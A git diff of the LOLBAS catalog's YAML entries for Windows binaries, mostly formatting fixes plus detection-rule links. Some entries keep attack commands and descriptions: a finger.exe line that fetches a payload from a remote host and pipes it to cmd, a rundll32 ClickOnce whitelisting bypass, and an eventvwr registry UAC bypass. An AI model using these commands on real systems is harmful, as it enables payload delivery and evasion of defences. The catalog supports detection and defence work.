https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml + - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules + - IOC: Cscript.exe executing files from alternate data streams + - IOC: DotNet CLR libraries loaded into cscript.exe + - IOC: DotNet CLR Usage Log - cscript.exe.log Resources: - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---- diff --git a/yml/OSBinaries/DataSvcUtil.yml b/yml/OSBinaries/DataSvcUtil.yml index e5d5c20..d4a7935 100644 --- a/yml/OSBinaries/DataSvcUtil.yml +++ b/yml/OSBinaries/DataSvcUtil.yml @@ -27,4 +27,3 @@ Resources: Acknowledgement: - Person: Ialle Teixeira Handle: '@NtSetDefault' ---- diff --git a/yml/OSBinaries/Desktopimgdownldr.yml b/yml/OSBinaries/Desktopimgdownldr.yml index 46fc551..439948a 100644 --- a/yml/OSBinaries/Desktopimgdownldr.yml +++ b/yml/OSBinaries/Desktopimgdownldr.yml @@ -26,4 +26,3 @@ Resources: Acknowledgement: - Person: Gal Kristal Handle: '@gal_kristal' ---- diff --git a/yml/OSBinaries/Dfsvc.yml b/yml/OSBinaries/Dfsvc.yml index 075e45a..28f21cf 100644 --- a/yml/OSBinaries/Dfsvc.yml +++ b/yml/OSBinaries/Dfsvc.yml @@ -7,7 +7,7 @@ Commands: - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host) Usecase: Use binary to bypass Application whitelisting - Category: AWL bypass + Category: AWL Bypass Privileges: User MitreID: T1127 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 @@ -17,13 +17,12 @@ Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe Code_Sample: -- Code: + - Code: Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml + - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml Resources: - Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf - Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe Acknowledgement: - Person: Casey Smith Handle: '@subtee' ---- diff --git a/yml/OSBinaries/Diantz.yml b/yml/OSBinaries/Diantz.yml index ab75e5d..18d1979 100644 --- a/yml/OSBinaries/Diantz.yml +++ b/yml/OSBinaries/Diantz.yml @@ -35,4 +35,3 @@ Acknowledgement: Handle: '@tim8288' - Person: Hai Vaknin Handle: '@vakninhai' ---- diff --git a/yml/OSBinaries/Diskshadow.yml b/yml/OSBinaries/Diskshadow.yml index c9ba246..382ecf7 100644 --- a/yml/OSBinaries/Diskshadow.yml +++ b/yml/OSBinaries/Diskshadow.yml @@ -22,15 +22,14 @@ Full_Path: - Path: C:\Windows\System32\diskshadow.exe - Path: C:\Windows\SysWOW64\diskshadow.exe Code_Sample: -- Code: + - Code: Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/b4d5b44ea86cda24f38a87d3b0c5f9d4455bf841/rules/windows/process_creation/win_susp_diskshadow.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/b3df5bf325461df9bcfeb051895b0c8dc3258234/rules/windows/process_creation/win_shadow_copies_deletion.yml - - Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml - - IOC: Child process from diskshadow.exe + - Sigma: https://github.com/SigmaHQ/sigma/blob/b4d5b44ea86cda24f38a87d3b0c5f9d4455bf841/rules/windows/process_creation/win_susp_diskshadow.yml + - Sigma: https://github.com/SigmaHQ/sigma/blob/b3df5bf325461df9bcfeb051895b0c8dc3258234/rules/windows/process_creation/win_shadow_copies_deletion.yml + - Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml + - IOC: Child process from diskshadow.exe Resources: - Link: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ Acknowledgement: - Person: Jimmy Handle: '@bohops' ---- diff --git a/yml/OSBinaries/Dnscmd.yml b/yml/OSBinaries/Dnscmd.yml index 64703cb..e5eea9d 100644 --- a/yml/OSBinaries/Dnscmd.yml +++ b/yml/OSBinaries/Dnscmd.yml @@ -15,10 +15,10 @@ Full_Path: - Path: C:\Windows\System32\Dnscmd.exe - Path: C:\Windows\SysWOW64\Dnscmd.exe Code_Sample: -- Code: + - Code: Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/b08b3e2b0d5111c637dbede1381b07cb79f8c2eb/rules/windows/process_creation/process_creation_dns_serverlevelplugindll.yml - - IOC: Dnscmd.exe loading dll from UNC/arbitrary path + - Sigma: https://github.com/SigmaHQ/sigma/blob/b08b3e2b0d5111c637dbede1381b07cb79f8c2eb/rules/windows/process_creation/process_creation_dns_serverlevelplugindll.yml + - IOC: Dnscmd.exe loading dll from UNC/arbitrary path Resources: - Link: https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83 - Link: https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html @@ -32,4 +32,3 @@ Acknowledgement: Handle: '@dim0x69' - Person: Nikhil SamratAshok Handle: '@nikhil_mitt' ---- diff --git a/yml/OSBinaries/Esentutl.yml b/yml/OSBinaries/Esentutl.yml index 6a3656a..21554b2 100644 --- a/yml/OSBinaries/Esentutl.yml +++ b/yml/OSBinaries/Esentutl.yml @@ -50,14 +50,14 @@ Full_Path: - Path: C:\Windows\System32\esentutl.exe - Path: C:\Windows\SysWOW64\esentutl.exe Code_Sample: -- Code: + - Code: Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_vssadmin_ntds_activity.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_esentutl_activity.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/bacb44ab972343358bae612e4625f8ba2e043573/rules/windows/process_creation/process_susp_esentutl_params.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_copying_sensitive_files_with_credential_data.yml - - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/esentutl_sam_copy.yml - - Elastic: https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml + - Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_vssadmin_ntds_activity.yml + - Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_esentutl_activity.yml + - Sigma: https://github.com/SigmaHQ/sigma/blob/bacb44ab972343358bae612e4625f8ba2e043573/rules/windows/process_creation/process_susp_esentutl_params.yml + - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_copying_sensitive_files_with_credential_data.yml + - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/esentutl_sam_copy.yml + - Elastic: https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml Resources: - Link: https://twitter.com/egre55/status/985994639202283520 - Link: https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/ @@ -66,5 +66,4 @@ Acknowledgement: - Person: egre55 Handle: '@egre55' - Person: Mike Cary - Handle: 'grayfold3d' ---- + Handle: '@grayfold3d' diff --git a/yml/OSBinaries/Eventvwr.yml b/yml/OSBinaries/Eventvwr.yml index 2d5413d..d5fd50e 100644 --- a/yml/OSBinaries/Eventvwr.yml +++ b/yml/OSBinaries/Eventvwr.yml @@ -7,7 +7,7 @@ Commands: - Command: eventvwr.exe Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user. Usecase: Execute a binary or script as a high-integrity process without a UAC prompt. - Category: UAC bypass + Category: UAC Bypass Privileges: User MitreID: T1548.002 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 @@ -31,4 +31,3 @@ Acknowledgement: Handle: '@enigma0x3' - Person: Matt Graeber Handle: '@mattifestation' ---- diff --git a/yml/OSBinaries/Expand.yml b/yml/OSBinaries/Expand.yml index 4574fe4..90e472c 100644 --- a/yml/OSBinaries/Expand.yml +++ b/yml/OSBinaries/Expand.yml @@ -29,10 +29,10 @@ Full_Path: - Path: C:\Windows\System32\Expand.exe - Path: C:\Windows\SysWOW64\Expand.exe Code_Sample: -- Code: + - Code: Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/b25fbbea54014565fc4551f94c97c0d7550b1c04/rules/windows/process_creation/sysmon_expand_cabinet_files.yml - - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml + - Sigma: https://github.com/SigmaHQ/sigma/blob/b25fbbea54014565fc4551f94c97c0d7550b1c04/rules/windows/process_creation/sysmon_expand_cabinet_files.yml + - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml Resources: - Link: https://twitter.com/infosecn1nja/status/986628482858807297 - Link: https://twitter.com/Oddvarmoe/status/986709068759949319 @@ -41,4 +41,3 @@ Acknowledgement: Handle: '@infosecn1nja' - Person: Oddvar Moe Handle: '@oddvarmoe' ---- diff --git a/yml/OSBinaries/Explorer.yml b/yml/OSBinaries/Explorer.yml index b38d467..60deb15 100644 --- a/yml/OSBinaries/Explorer.yml +++ b/yml/OSBinaries/Explorer.yml @@ -37,4 +37,3 @@ Acknowledgement: Handle: '@CyberRaiju' - Person: Jimmy Handle: '@bohops' ---- diff --git a/yml/OSBinaries/Extexport.yml b/yml/OSBinaries/Extexport.yml index 0b61161..5b8080d 100644 --- a/yml/OSBinaries/Extexport.yml +++ b/yml/OSBinaries/Extexport.yml @@ -1,6 +1,6 @@ --- Name: Extexport.exe -Description: +Description: Load a DLL located in the c:\test folder with a specific name. Author: 'Oddvar Moe' Created: 2018-05-25 Commands: @@ -15,7 +15,7 @@ Full_Path: - Path: C:\Program Files\Internet Explorer\Extexport.exe - Path: C:\Program Files (x86)\Internet Explorer\Extexport.exe Code_Sample: - - Code: + - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extexport.yml - IOC: Extexport.exe loads dll and is execute from other folder the original path @@ -24,4 +24,3 @@ Resources: Acknowledgement: - Person: Adam Handle: '@hexacorn' ---- diff --git a/yml/OSBinaries/Extrac32.yml b/yml/OSBinaries/Extrac32.yml index 4682e7c..19ac2bf 100644 --- a/yml/OSBinaries/Extrac32.yml +++ b/yml/OSBinaries/Extrac32.yml @@ -1,6 +1,6 @@ --- Name: Extrac32.exe -Description: +Description: Extract to ADS, copy or overwrite a file with Extrac32.exe Author: 'Oddvar Moe' Created: 2018-05-25 Commands: @@ -38,9 +38,9 @@ Full_Path: Code_Sample: - Code: Detection: - - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml - - Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extrac32.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extrac32_ads.yml + - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml + - Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extrac32.yml + - Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extrac32_ads.yml Resources: - Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f @@ -54,4 +54,3 @@ Acknowledgement: Handle: '@VakninHai' - Person: Tamir Yehuda Handle: '@tim8288' ---- diff --git a/yml/OSBinaries/Findstr.yml b/yml/OSBinaries/Findstr.yml index 22fcbb0..3700472 100644 --- a/yml/OSBinaries/Findstr.yml +++ b/yml/OSBinaries/Findstr.yml @@ -1,6 +1,6 @@ --- Name: Findstr.exe -Description: +Description: Write to ADS, discover, or download files with Findstr.exe Author: 'Oddvar Moe' Created: 2018-05-25 Commands: @@ -36,13 +36,12 @@ Full_Path: - Path: C:\Windows\System32\findstr.exe - Path: C:\Windows\SysWOW64\findstr.exe Code_Sample: -- Code: + - Code: Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_findstr.yml + - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_findstr.yml Resources: - Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---- diff --git a/yml/OSBinaries/Finger.yml b/yml/OSBinaries/Finger.yml index e84d9d9..936098f 100644 --- a/yml/OSBinaries/Finger.yml +++ b/yml/OSBinaries/Finger.yml @@ -1,31 +1,30 @@ ---- -Name: Finger.exe -Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon -Author: Ruben Revuelta -Created: 2021-08-30 -Commands: - - Command: finger user@example.host.com | more +2 | cmd - Description: 'Downloads payload from remote Finger server. This example connects to "example.host.com" asking for user "user"; the result could contain malicious shellcode which is executed by the cmd process.' - Usecase: Download malicious payload - Category: Download - Privileges: User - MitreID: T1105 - OperatingSystem: Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows Server 2008R2, Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019, Windows Server 2022 -Full_Path: - - Path: c:\windows\system32\finger.exe - - Path: c:\windows\syswow64\finger.exe -Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_finger_usage.yml - - IOC: finger.exe should not be run on a normal workstation. - - IOC: finger.exe connecting to external resources. -Resources: - - Link: https://twitter.com/DissectMalware/status/997340270273409024 - - Link: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11) -Acknowledgement: - - Person: Ruben Revuelta (MAPFRE CERT) - Handle: '@rubn_RB' - - Person: Jose A. Jimenez (MAPFRE CERT) - Handle: '@Ocelotty6669' - - Person: Malwrologist - Handle: '@DissectMalware' ---- +--- +Name: Finger.exe +Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon +Author: Ruben Revuelta +Created: 2021-08-30 +Commands: + - Command: finger user@example.host.com | more +2 | cmd + Description: 'Downloads payload from remote Finger server. This example connects to "example.host.com" asking for user "user"; the result could contain malicious shellcode which is executed by the cmd process.' + Usecase: Download malicious payload + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows Server 2008R2, Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019, Windows Server 2022 +Full_Path: + - Path: c:\windows\system32\finger.exe + - Path: c:\windows\syswow64\finger.exe +Detection: + - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_finger_usage.yml + - IOC: finger.exe should not be run on a normal workstation. + - IOC: finger.exe connecting to external resources. +Resources: + - Link: https://twitter.com/DissectMalware/status/997340270273409024 + - Link: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11) +Acknowledgement: + - Person: Ruben Revuelta (MAPFRE CERT) + Handle: '@rubn_RB' + - Person: Jose A. Jimenez (MAPFRE CERT) + Handle: '@Ocelotty6669' + - Person: Malwrologist + Handle: '@DissectMalware' diff --git a/yml/OSBinaries/FltMC.yml b/yml/OSBinaries/FltMC.yml index 8717c5b..bcc8caf 100644 --- a/yml/OSBinaries/FltMC.yml +++ b/yml/OSBinaries/FltMC.yml @@ -25,4 +25,3 @@ Resources: Acknowledgement: - Person: Carlos Perez Handle: '@Carlos_Perez' ---- diff --git a/yml/OSBinaries/Forfiles.yml b/yml/OSBinaries/Forfiles.yml index b8761ad..f9778ea 100644 --- a/yml/OSBinaries/Forfiles.yml +++ b/yml/OSBinaries/Forfiles.yml @@ -22,9 +22,9 @@ Full_Path: - Path: C:\Windows\System32\forfiles.exe - Path: C:\Windows\SysWOW64\forfiles.exe Code_Sample: -- Code: + - Code: Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_indirect_cmd.yml + - Sigma: https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_indirect_cmd.yml Resources: - Link: https://twitter.com/vector_sec/status/896049052642533376 - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f @@ -34,4 +34,3 @@ Acknowledgement: Handle: '@vector_sec' - Person: Oddvar Moe Handle: '@oddvarmoe' ---- diff --git a/yml/OSBinaries/Ftp.yml b/yml/OSBinaries/Ftp.yml index c41136e..6293171 100644 --- a/yml/OSBinaries/Ftp.yml +++ b/yml/OSBinaries/Ftp.yml @@ -22,10 +22,10 @@ Full_Path: - Path: C:\Windows\System32\ftp.exe - Path: C:\Windows\SysWOW64\ftp.exe Code_Sample: -- Code: + - Code: Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_ftp.yml - - IOC: cmd /c as child process of ftp.exe + - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_ftp.yml + - IOC: cmd /c as child process of ftp.exe Resources: - Link: https://twitter.com/0xAmit/status/1070063130636640256 - Link: https://medium.com/@0xamit/lets-talk-about-security-research-discoveries-and-proper-discussion-etiquette-on-twitter-10f9be6d1939 @@ -37,5 +37,4 @@ Acknowledgement: - Person: BennyHusted Handle: '' - Person: Amit Serper - Handle: '@0xAmit ' ---- + Handle: '@0xAmit' diff --git a/yml/OSBinaries/GfxDownloadWrapper.yml b/yml/OSBinaries/GfxDownloadWrapper.yml index bd3ec8f..9675000 100644 --- a/yml/OSBinaries/GfxDownloadWrapper.yml +++ b/yml/OSBinaries/GfxDownloadWrapper.yml @@ -176,4 +176,3 @@ Resources: Acknowledgement: - Person: Jesus Galvez Handle: ---- diff --git a/yml/OSBinaries/Gpscript.yml b/yml/OSBinaries/Gpscript.yml index 22ecd6a..ef8076e 100644 --- a/yml/OSBinaries/Gpscript.yml +++ b/yml/OSBinaries/Gpscript.yml @@ -32,4 +32,3 @@ Resources: Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---- diff --git a/yml/OSBinaries/Hh.yml b/yml/OSBinaries/Hh.yml index ad15db6..bbf28b8 100644 --- a/yml/OSBinaries/Hh.yml +++ b/yml/OSBinaries/Hh.yml @@ -35,4 +35,3 @@ Resources: Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---- diff --git a/yml/OSBinaries/IMEWDBLD.yml b/yml/OSBinaries/IMEWDBLD.yml index 2199ed5..806f00b 100644 --- a/yml/OSBinaries/IMEWDBLD.yml +++ b/yml/OSBinaries/IMEWDBLD.yml @@ -20,4 +20,3 @@ Resources: Acknowledgement: - Person: Wade Hickey Handle: '@notwhickey' ---- diff --git a/yml/OSBinaries/Ie4uinit.yml b/yml/OSBinaries/Ie4uinit.yml index f5a9e3d..8fbbcc4 100644 --- a/yml/OSBinaries/Ie4uinit.yml +++ b/yml/OSBinaries/Ie4uinit.yml @@ -1,6 +1,6 @@ --- Name: Ie4uinit.exe -Description: +Description: Executes commands from a specially prepared ie4uinit.inf file. Author: 'Oddvar Moe' Created: 2018-05-25 Commands: @@ -27,4 +27,3 @@ Resources: Acknowledgement: - Person: Jimmy Handle: '@bohops' ---- diff --git a/yml/OSBinaries/Ieexec.yml b/yml/OSBinaries/Ieexec.yml index aa591b1..c14b4a3 100644 --- a/yml/OSBinaries/Ieexec.yml +++ b/yml/OSBinaries/Ieexec.yml @@ -34,4 +34,3 @@ Resources: Acknowledgement: - Person: Casey Smith Handle: '@subtee' ---- diff --git a/yml/OSBinaries/Ilasm.yml b/yml/OSBinaries/Ilasm.yml index 98bf87c..3132856 100644 --- a/yml/OSBinaries/Ilasm.yml +++ b/yml/OSBinaries/Ilasm.yml @@ -17,6 +17,7 @@ Commands: Category: Compile Privileges: User MitreID: T1127 + OperatingSystem: Windows 10,7 Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe @@ -32,4 +33,3 @@ Acknowledgement: Handle: '@VakninHai' - Person: Lior Adar Handle: ---- diff --git a/yml/OSBinaries/Infdefaultinstall.yml b/yml/OSBinaries/Infdefaultinstall.yml index 894317c..46b87fe 100644 --- a/yml/OSBinaries/Infdefaultinstall.yml +++ b/yml/OSBinaries/Infdefaultinstall.yml @@ -15,10 +15,10 @@ Full_Path: - Path: C:\Windows\System32\Infdefaultinstall.exe - Path: C:\Windows\SysWOW64\Infdefaultinstall.exe Code_Sample: -- Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a + - Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/85d47aeabc25bbd023284849f4466c1e00b855ce/rules/windows/process_creation/process_creation_infdefaultinstall.yml - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules + - Sigma: https://github.com/SigmaHQ/sigma/blob/85d47aeabc25bbd023284849f4466c1e00b855ce/rules/windows/process_creation/process_creation_infdefaultinstall.yml + - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules Resources: - Link: https://twitter.com/KyleHanslovan/status/911997635455852544 - Link: https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/ @@ -26,4 +26,3 @@ Resources: Acknowledgement: - Person: Kyle Hanslovan Handle: '@kylehanslovan' ---- diff --git a/yml/OSBinaries/Installutil.yml b/yml/OSBinaries/Installutil.yml index 4314b56..b257c39 100644 --- a/yml/OSBinaries/Installutil.yml +++ b/yml/OSBinaries/Installutil.yml @@ -7,7 +7,7 @@ Commands: - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll Description: Execute the target .NET DLL or EXE. Usecase: Use to execute code and bypass application whitelisting - Category: AWL bypass + Category: AWL Bypass Privileges: User MitreID: T1218.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 @@ -24,11 +24,11 @@ Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe Code_Sample: -- Code: + - Code: Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml - - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml - - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml + - Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml + - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml + - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml Resources: - Link: https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/ - Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12 @@ -39,4 +39,3 @@ Resources: Acknowledgement: - Person: Casey Smith Handle: '@subtee' ---- diff --git a/yml/OSBinaries/Jsc.yml b/yml/OSBinaries/Jsc.yml index 9e2af4a..bb1d012 100644 --- a/yml/OSBinaries/Jsc.yml +++ b/yml/OSBinaries/Jsc.yml @@ -34,4 +34,3 @@ Resources: Acknowledgement: - Person: Malwrologist Handle: '@DissectMalware' ---- diff --git a/yml/OSBinaries/Makecab.yml b/yml/OSBinaries/Makecab.yml index 7776867..40a8e0c 100644 --- a/yml/OSBinaries/Makecab.yml +++ b/yml/OSBinaries/Makecab.yml @@ -40,4 +40,3 @@ Resources: Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---- diff --git a/yml/OSBinaries/Mavinject.yml b/yml/OSBinaries/Mavinject.yml index a713768..1a184d3 100644 --- a/yml/OSBinaries/Mavinject.yml +++ b/yml/OSBinaries/Mavinject.yml @@ -36,4 +36,3 @@ Acknowledgement: Handle: '@gN3mes1s' - Person: Oddvar Moe Handle: '@oddvarmoe' ---- diff --git a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml index 5d1f884..beaf2c0 100644 --- a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml +++ b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml @@ -56,4 +56,3 @@ Acknowledgement: Handle: '@FortyNorthSec' - Person: Bank Security Handle: '@Bank_Security' ---- diff --git a/yml/OSBinaries/Mmc.yml b/yml/OSBinaries/Mmc.yml index 4bf70e8..5b8f1bd 100644 --- a/yml/OSBinaries/Mmc.yml +++ b/yml/OSBinaries/Mmc.yml @@ -22,10 +22,10 @@ Full_Path: - Path: C:\Windows\System32\mmc.exe - Path: C:\Windows\SysWOW64\mmc.exe Code_Sample: -- Code: + - Code: Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_mmc_spawn_shell.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/b731c2059445eef53e37232a5f3634c3473aae0c/rules/windows/file_event/sysmon_uac_bypass_dotnet_profiler.yml + - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_mmc_spawn_shell.yml + - Sigma: https://github.com/SigmaHQ/sigma/blob/b731c2059445eef53e37232a5f3634c3473aae0c/rules/windows/file_event/sysmon_uac_bypass_dotnet_profiler.yml Resources: - Link: https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/ - Link: https://offsec.almond.consulting/UAC-bypass-dotnet.html @@ -34,4 +34,3 @@ Acknowledgement: Handle: '@bohops' - Person: clem Handle: '@clavoillotte' ---- diff --git a/yml/OSBinaries/MpCmdRun.yml b/yml/OSBinaries/MpCmdRun.yml index 33ac149..1707ea6 100644 --- a/yml/OSBinaries/MpCmdRun.yml +++ b/yml/OSBinaries/MpCmdRun.yml @@ -53,4 +53,3 @@ Acknowledgement: Handle: '' - Person: Cedric Handle: '@th3c3dr1c' ---- diff --git a/yml/OSBinaries/Msbuild.yml b/yml/OSBinaries/Msbuild.yml index abb2597..705d0c0 100644 --- a/yml/OSBinaries/Msbuild.yml +++ b/yml/OSBinaries/Msbuild.yml @@ -7,7 +7,7 @@ Commands: - Command: msbuild.exe pshell.xml Description: Build and execute a C# project stored in the target 